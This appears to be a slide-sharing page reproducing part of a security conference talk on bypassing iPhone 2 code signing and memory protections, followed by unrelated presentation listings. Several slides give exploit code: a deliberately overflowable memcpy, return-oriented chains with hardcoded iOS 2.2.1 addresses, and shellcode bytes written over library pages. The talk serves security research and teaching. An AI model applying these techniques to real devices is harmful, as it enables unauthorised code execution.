post exploitation bliss meterpreter for iphone
play

Post Exploitation Bliss: Meterpreter for iPhone Charlie MIller - PowerPoint PPT Presentation

Apr 11, 2023 •146 likes •885 views

Post Exploitation Bliss: Meterpreter for iPhone Charlie MIller Vincenzo Iozzo Independent Security Evaluators Zynamics & Secure Network cmiller@securityevaluators.com vincenzo.iozzo@zynamics.com Who we are Charlie First to hack the

  1. Post Exploitation Bliss: Meterpreter for iPhone Charlie MIller Vincenzo Iozzo Independent Security Evaluators Zynamics & Secure Network cmiller@securityevaluators.com vincenzo.iozzo@zynamics.com

  2. Who we are Charlie First to hack the iPhone, G1 Phone Pwn2Own winner, 2008, 2009 Author: Mac Hackers Handbook Vincenzo Student at Politecnico di Milano Security Consultant at Secure Network srl Reverse Engineer at Zynamics GmbH

  3. Agenda iPhone 2 security architecture iPhone 2 memory protections Payloads Meterpreter iPhone 3 changes Current thoughts on iPhone 3 payloads

  4. iPhone 2 Security Architecture

  5. iPhones Jailbroken: various patches, can access FS, run unsigned code, etc Development: click “use for development” in Xcode. Adds some debugging tools Provisioned: Can run Apple code or from developer phone is provisioned for Factory phones: no modifications at all Warning: Testing only on first 3

  6. Security Architecture Overview Reduced attack surface Stripped down OS Code signing Randomization (or lack thereof) Sandboxing Memory protections

  7. iPhone 2 memory protections

  8. iPhone 1 & 2 Version 1: Heap was RWX, easy to run shellcode Version 2: No RWX pages On Jailbroken can go from RW -> RX Not on Development or Provisioned (or Factory) phones CSW talks assumed jailbroken

  9. Some facts about code signing On execve() the kernel searches for a segment LC_CODE_SIGNATURE which contains the signature If the signature is already present in the kernel it is validated using SHA-1 hashes and offsets If the signature is not found it is validated and allocated, SHA-1 hashes are checked too Hashes are calculated on the whole page, so we cannot write malicious code in the slack space

  10. What’s the effect of code signing? When a page is signed the kernel adds a flag to that page /* mark this vnode's VM object as having "signed pages" */ kr = memory_object_signed(uip->ui_control, TRUE);

  11. What if a page is not signed? We can still map a page (following XN policy) with RX permissions Whenever we try to access that page a SIGBUS is raised If we try to change permissions of a page to enable execution (using mprotect or vm_protect), the call fails*

  12. Why breaking codesigning breaks memory protections #if CONFIG_EMBEDDED if (cur_protection & VM_PROT_WRITE) { if (cur_protection & VM_PROT_EXECUTE) { printf("EMBEDDED: %s curprot cannot be write+execute. turning off execute\n", __PRETTY_FUNCTION__); cur_protection &= ~VM_PROT_EXECUTE; } } if (max_protection & VM_PROT_WRITE) { if (max_protection & VM_PROT_EXECUTE) { /* Right now all kinds of data segments are RWX. No point in logging that. */ /* printf("EMBEDDED: %s maxprot cannot be write+execute. turning off execute\n", __PRETTY_FUNCTION__); */ /* Try to take a hint from curprot. If curprot is not writable, * make maxprot not writable. Otherwise make it not executable. */ if((cur_protection & VM_PROT_WRITE) == 0) { max_protection &= ~VM_PROT_WRITE; } else { max_protection &= ~VM_PROT_EXECUTE; <------ NOP’d by jailbreak } } } assert ((cur_protection | max_protection) == max_protection); #endif /* CONFIG_EMBEDDED */

  13. Thoughts about getting shellcode running Can’t write shellcode to RW and turn to RX Can’t allocate RX heap page (hoping to have data there) Can’t change a RX page to RW and back How the hell do debuggers set software breakpoints?

  14. This does work! void (*f)(); unsigned int addy = 0x31414530 ; // getchar() unsigned int ssize = sizeof(shellcode3); kern_return_t r ; r = vm_protect ( mach_task_self(), (vm_address_t) addy, ssize, FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY ); if(r==KERN_SUCCESS){ printf("vm_protect is cool\n"); } memcpy((unsigned int *) addy, shellcode3, sizeof(shellcode3)); f = (void (*)()) addy; f(); So we can overwrite local copies of libraries with our shellcode and execute it

  15. Payloads

  16. How to run code? Can’t write and execute code from unsigned pages Can’t write to file and exec/dlopen However, nothing is randomized So we can use return-to-libc/return-oriented-programming

  17. ARM basics 16 32-bit registers, r0-r15 r13 = sp, stack pointer r14 = lr, link register - stores return address r15 = pc, program counter RISC - few instructions, mostly uniform length Placing a dword in a register usually requires more than 1 instruction Can switch to Thumb mode (2 or 4 byte instructions)

  18. Function calls Instead of {jmp, call} you get {b, bl, bx, blx} b (branch) changes execution to offset from pc specified bl does same but sets lr to next instruction (ret address) In particular, ret addy not on stack • bx/blx similar except address is absolute pc is a general purpose register, i.e. mov pc, r1 works First 4 arguments passed in r0-r3, rest on the stack

  19. Example, ARM

  20. Example, Thumb

  21. Return-to-libc, x86 Reuse executable code already in process Layout data near ESP such that arguments and return addresses are used from user supplied data This is a pain.... Typically, quickly try to call system() or a function to disable DEP (or mprotect)

  22. ARM issues Function arguments passed in registers, not on stack Must always find code to load stack values into registers Can’t “create” instructions by jumping to middle of existing instructions (unlike x86) Return address not always stored on stack

  23. Payload: Beep and Vibrate The second ever iPhone payload - v 1.0.0 Replicate what happens when a text message is received: vibrate and beep We want to have the following code executed AudioServicesPlaySystemSound(0x3ea); exit(0);

  24. So I wrote this little program void foo(unsigned int *shellcode){ char buf[8]; memcpy(buf, shellcode, sizeof(int) * 25); } It’s stupid, but serves its purpose

  25. Set r0-r3, PC shellcode1a[0] =0x11112222; shellcode1a[1] =0x33334444; shellcode1a[2] =0x12345566; // r7 shellcode1a[3] =0x314e4bec; // PC 0x314e4bec: ldmia sp!, {r0, r1, r2, r3, pc} All addresses for 2.2.1

  26. Call AudioServicesPlaySystemSound shellcode1a[4]=0x000003ea; // r0 shellcode1a[5]=0x00112233; // r1 shellcode1a[6]=0xddddeeee; // r2 shellcode1a[7]=0xffff0000; // r3 shellcode1a[8]=0x34945568; // PC 0x34945568 = AudioServicesPlaySystemSound + 4

  27. 0x34945564 <AudioServicesPlaySystemSound+0>: push {r4, r7, lr} 0x34945568 <AudioServicesPlaySystemSound+4>: add r7, sp, #4 0x3494556c <AudioServicesPlaySystemSound+8>: mov r4, r0 0x34945570 <AudioServicesPlaySystemSound+12>: bl 0x349420f4 <AudioServicesGetPropertyInfo+404> 0x34945574 <AudioServicesPlaySystemSound+16>: cmp r0, #0 ; 0x0 0x34945578 <AudioServicesPlaySystemSound+20>: popeq {r4, r7, pc} 0x3494557c <AudioServicesPlaySystemSound+24>: bl 0x34943c98 <AudioServicesRemoveSystemSoundCompletion+1748> 0x34945580 <AudioServicesPlaySystemSound+28>: cmp r0, #0 ; 0x0 0x34945584 <AudioServicesPlaySystemSound+32>: popeq {r4, r7, pc} 0x34945588 <AudioServicesPlaySystemSound+36>: mov r0, #1 ; 0x1 0x3494558c <AudioServicesPlaySystemSound+40>: bl 0x3494332c <AudioServicesGetPropertyInfo+5068> 0x34945590 <AudioServicesPlaySystemSound+44>: subs r1, r0, #0 0x34945594 <AudioServicesPlaySystemSound+48>: popne {r4, r7, pc} 0x34945598 <AudioServicesPlaySystemSound+52>: mov r0, r4 0x3494559c <AudioServicesPlaySystemSound+56>: mov r2, r1 0x349455a0 <AudioServicesPlaySystemSound+60>: pop {r4, r7, lr } 0x349455a4 <AudioServicesPlaySystemSound+64>: b 0x34944a40 <AudioServicesRemoveSystemSoundCompletion+5244>

  28. Progress By not jumping to the first instruction, lr is not pushed on the stack When lr is popped off the stack, it will pop a value we control We regain control and call exit at this point

  29. Call _exit() shellcode1a[9] = 0x11112222; // r4 shellcode1a[10] = 0x33324444; // r7 shellcode1a[11] = 0x31463018; // lr should probably set something in r0... Debugger stopped. Program exited with status value:0.

  30. Demo! iPhone 2.2.1 Not jailbroken Development phone (would work on 3.0 factory)

  31. Payload: Arbitrary shellcode We craft return-to-libc for the following C code vm_protect( mach_task_self(), (vm_address_t) addy, size, FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY); memcpy(addy, shellcode, size); addy()

  32. Similar start char realshellcodestatic[] = "\x01\x00\xa0\xe3\x02\x10\xa0\xe3" "\x03\x30\xa0\xe3\x04\x40\xa0\xe3” “\x05\x50\xa0\xe3\x06\x60\xa0\xe3" "\xf8\xff\xff\xea"; unsigned int *realshellcode = malloc(128 * sizeof(int)); memcpy(realshellcode, realshellcodestatic, sizeof(realshellcodestatic)); shellcode3a[0] =0x11112222; shellcode3a[1] =0x33334444; shellcode3a[2] =0x12345566; // r7 shellcode3a[3] =0x314e4bec; // PC

  33. Call protect() shellcode3a[4]=0x31414530; // r0 getchar() shellcode3a[5]=0x00112233; // r1 shellcode3a[6]=0x00000013; // r2 VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY shellcode3a[7]=0x00000004; // r3 Do max_protection = FALSE shellcode[8]=0x3145677c; // PC protect() + 4 protect() calls vm_protect with mach_task_self() and size 0x1000 0x31456828 <protect+176>: pop {r4, r5, r6, r7, pc}

  34. Load up for call to memcpy shellcode3a[9] =0x12345678; // r4 shellcode3a[10]=0x23456789; // r5 shellcode3a[11]=0x3456789a; // r6 shellcode3a[12]=0x456789ab; // r7 shellcode3a[13]=0x314e4bec; // PC

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

To BLISS-B or not to be - Attacking strongSwans Implementation of Post-Quantum Signatures

To BLISS-B or not to be - Attacking strongSwans Implementation of Post-Quantum Signatures

S C I E N C E P A S S I O N T E C H N O L O G Y To BLISS-B or not to be - Attacking strongSwans Implementation of Post-Quantum Signatures Peter Pessl 1 , Leon Groot Bruinderink 2 , Yuval Yarom 3 1 Graz University of

416 views • 27 slides
Coconut Bliss THERE ARE MANY WAYS TO ACHIEVE BLISS WE USE COCONUTS. Luna &amp; Larry Old

Coconut Bliss THERE ARE MANY WAYS TO ACHIEVE BLISS WE USE COCONUTS. Luna &amp; Larry Old

Coconut Bliss THERE ARE MANY WAYS TO ACHIEVE BLISS WE USE COCONUTS. Luna &amp; Larry Old School Quality The Evolution of Ice Cream A simple concept that met a growing need Coconut Milk based Ice Cream, sweetened with Agave Syrup

504 views • 14 slides
Post Exploitation Operations with Cloud Synchronization Services Jake Williams

Post Exploitation Operations with Cloud Synchronization Services Jake Williams

Post Exploitation Operations with Cloud Synchronization Services Jake Williams jwilliams@csr-group.com @MalwareJake Agenda The problem (cloud backup/synchronization) The solution (DropSmack) Next steps Insecure Authentication

1.1k views • 55 slides
Writing malware while the blue team is staring at you meterpreter&gt; getuid @mubix Father

Writing malware while the blue team is staring at you meterpreter&gt; getuid @mubix Father

Mubix Rob Fuller Writing malware while the blue team is staring at you meterpreter&gt; getuid @mubix Father Husband United States Marine Co-Founder of NoVA Hackers Technical Consultant to HBOs Silicon Valley Security+, Linux+, A+,

1.02k views • 60 slides
through the exploitation of nonlinear post-buckling behavior Ariel Ibarra Pino Fifth deal.II

through the exploitation of nonlinear post-buckling behavior Ariel Ibarra Pino Fifth deal.II

UNIVERSITY OF MINNESOTA Aerospace Engineering and Mechanics COLLEGE OF SIENCE AND ENGINEERING Design of switchable many-state architectured materials through the exploitation of nonlinear post-buckling behavior Ariel Ibarra Pino Fifth deal.II

407 views • 3 slides
CLOUD POST EXPLOITATION Andrew Johnson @secprez | Sacha Faust @sachafaust | Cloud &amp;

CLOUD POST EXPLOITATION Andrew Johnson @secprez | Sacha Faust @sachafaust | Cloud &amp;

CLOUD POST EXPLOITATION Andrew Johnson @secprez | Sacha Faust @sachafaust | Cloud &amp; Enterprise Red T eam ake Aways Azure Overview Key T Cloud Pivots Trends and Countermeasures 2 eam Red Team Success Culture Collective Growth

1.31k views • 27 slides
State of the Art Post Exploitation in Hardened PHP Environments Stefan Esser

State of the Art Post Exploitation in Hardened PHP Environments Stefan Esser

http://www.sektioneins.de State of the Art Post Exploitation in Hardened PHP Environments Stefan Esser &lt;stefan.esser@sektioneins.de&gt; Who am I? Stefan Esser from Cologne/Germany Information Security since 1998 PHP Core

716 views • 61 slides
! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented Exploitation ! Techniques ! Demo ! Mac OS X x86_64 ! Conclusion ! Morris Worm (November 1988) ! Exploited a stack buffer overflow in BSD in.fingerd on VAX

1.02k views • 80 slides
MY IPHONE APPLICATIONS - 2020 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D

MY IPHONE APPLICATIONS - 2020 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D

MY IPHONE APPLICATIONS - 2020 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D TODAYS AGENDA Top 30 Applications on my Iphone listed here (I will go over as many as possible in 1 hour of presentation time) Additional

1.1k views • 72 slides
The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect

The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect

The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots GreHacks Gabriel Ryan (solstice) net user author /domain Gabriel Ryan Researcher @ Gotham Digital Science Worlds best Red

1.89k views • 125 slides
MY IPHONE APPLICATIONS - 2018 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D

MY IPHONE APPLICATIONS - 2018 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D

MY IPHONE APPLICATIONS - 2018 S U P P O R T I N G M E A N D O T H E R S W I T H A D H D TODAYS AGENDA Top 20 Applications on my Iphone Additional assorted applications you may find useful Format: Combination of screen

859 views • 56 slides
Basic iPhone Photography Denise Wolf March 18, 2019 Content Sources: Apple Support:

Basic iPhone Photography Denise Wolf March 18, 2019 Content Sources: Apple Support:

Basic iPhone Photography Denise Wolf March 18, 2019 Content Sources: Apple Support: Photography Apple: How To Shoot on iPhone iPhone: The Missing Manual by David Pogue Lynda.com (iPhone and iPad Photography with iOS 12) The Plan

560 views • 27 slides
iPhone Apps: From Concept to Launch Dev Day for iPhone London Raven Zachary 25 June 2010

iPhone Apps: From Concept to Launch Dev Day for iPhone London Raven Zachary 25 June 2010

iPhone Apps: From Concept to Launch Dev Day for iPhone London Raven Zachary 25 June 2010 Platform strategy User experience Design Product development Marketing raven.me iOS Agency Everything but the The Idea

1.26k views • 105 slides
2-view Alignment and RANSAC CSE P576 Dr. Matthew Brown AutoStitch iPhone Create gorgeous

2-view Alignment and RANSAC CSE P576 Dr. Matthew Brown AutoStitch iPhone Create gorgeous

2-view Alignment and RANSAC CSE P576 Dr. Matthew Brown AutoStitch iPhone Create gorgeous panoramic photos on your iPhone - Cult of Mac Raises the bar on iPhone panoramas - TUAW Magically combines the resulting shots -

218 views • 21 slides
Presentation Dinner 2018. 5km Newbury Parkruns HANNAH BLISS SEAN HOLMES CATH WHEELER NEIL

Presentation Dinner 2018. 5km Newbury Parkruns HANNAH BLISS SEAN HOLMES CATH WHEELER NEIL

Presentation Dinner 2018. 5km Newbury Parkruns HANNAH BLISS SEAN HOLMES CATH WHEELER NEIL GLENDON SIAN DAVIES MIKE BLISS 5 Miles Victory 5 HANNAH BLISS SEAN HOLMES CATH WHEELER MARTIN GROUNDSELL EMILY ARBUTHNOT SMITH SIMON

468 views • 3 slides
Wireless Plans Bill Dickhardt 10/13/2017 My mobile gear iPhone SE (pay as you go) iPhone

Wireless Plans Bill Dickhardt 10/13/2017 My mobile gear iPhone SE (pay as you go) iPhone

Wireless Plans Bill Dickhardt 10/13/2017 My mobile gear iPhone SE (pay as you go) iPhone 6 (500/500/500 per month) 2 mobile hotspots (900MB each per month) Total cost per month?? ~$18.25 per month iPhone SE (~$2.00 per

322 views • 18 slides
Going Mobile with Canvas: Beyond the Basics Ryan Seilhamer (UCF) Sandesh Tuladhar (Columbia) Ryan

Going Mobile with Canvas: Beyond the Basics Ryan Seilhamer (UCF) Sandesh Tuladhar (Columbia) Ryan

Going Mobile with Canvas: Beyond the Basics Ryan Seilhamer (UCF) Sandesh Tuladhar (Columbia) Ryan Seilhamer Instructional Designer University of Central Florida (UCF) Any of the Incredibles Sandesh Tuladhar Instructional

566 views • 30 slides
Using iPads to assess learners with an intellectual disability Formative and Summative

Using iPads to assess learners with an intellectual disability Formative and Summative

Using iPads to assess learners with an intellectual disability Formative and Summative Assessment of Key Skills in Communicating &amp; Literacy PLUs Cherryl Elliot Managing Numeracy Myself Key Skills for successful learning Managing

428 views • 17 slides
Hello, Im Will. Will Lewis Customer Relations Manager Texthelp @TH_Will

Hello, Im Will. Will Lewis Customer Relations Manager Texthelp @TH_Will

Hello, Im Will. Will Lewis Customer Relations Manager Texthelp @TH_Will w.lewis@texthelp.com Click this button to minimize Click this button to mute or unmute if you need to speak Sound check allows you to check if the right Choose to

479 views • 27 slides
PUTTING THE APP IN APPELLATE PRACTICE Blake Hawthorne Rich Phillips Don Cruse Electronic

PUTTING THE APP IN APPELLATE PRACTICE Blake Hawthorne Rich Phillips Don Cruse Electronic

PUTTING THE APP IN APPELLATE PRACTICE Blake Hawthorne Rich Phillips Don Cruse Electronic Copy of Materials SCOTXBlog: www.scotxblog.com Texas Appellate Watch Blog: www.TexasAppellateWatch.typepad.com Reading Apps iBooks LegalViewer

568 views • 21 slides
Stanford CS193p Developing Applications for iOS Winter 2017 CS193p Winter 2017 Today Autolayout

Stanford CS193p Developing Applications for iOS Winter 2017 CS193p Winter 2017 Today Autolayout

Stanford CS193p Developing Applications for iOS Winter 2017 CS193p Winter 2017 Today Autolayout Review Size Classes Demos CS193p Winter 2017 Autolayout Youve seen a lot of Autolayout already Using the dashed blue lines to try to tell

363 views • 9 slides
Introduction to iPhone Development IAP 2010 iphonedev.csail.mit.edu edward benson /

Introduction to iPhone Development IAP 2010 iphonedev.csail.mit.edu edward benson /

Introduction to iPhone Development IAP 2010 iphonedev.csail.mit.edu edward benson / eob@csail.mit.edu Monday, January 11, 2010 The Class When Monday January 11 - Friday January 15 2-4 PM What Mixture of lecture and coding lab Goal

273 views • 8 slides
Building Java Programs Chapter 9 Inheritance and Polymorphism reading: 9.1 - 9.2 2 Recall:

Building Java Programs Chapter 9 Inheritance and Polymorphism reading: 9.1 - 9.2 2 Recall:

Building Java Programs Chapter 9 Inheritance and Polymorphism reading: 9.1 - 9.2 2 Recall: Inheritance inheritance : Forming new classes based on existing ones. a way to share/ reuse code between two or more classes superclass :

116 views • 11 slides
Prolog to Lecture 4 CS 236 On-Line MS Program Networks and Systems Security Peter Reiher

Prolog to Lecture 4 CS 236 On-Line MS Program Networks and Systems Security Peter Reiher

Prolog to Lecture 4 CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Lecture 4 Page 1 CS 236 Online Brute Force Attacks, the iPhone, and the FBI Recently lots of news about the FBI needing to crack an iPhone It

85 views • 8 slides

More recommend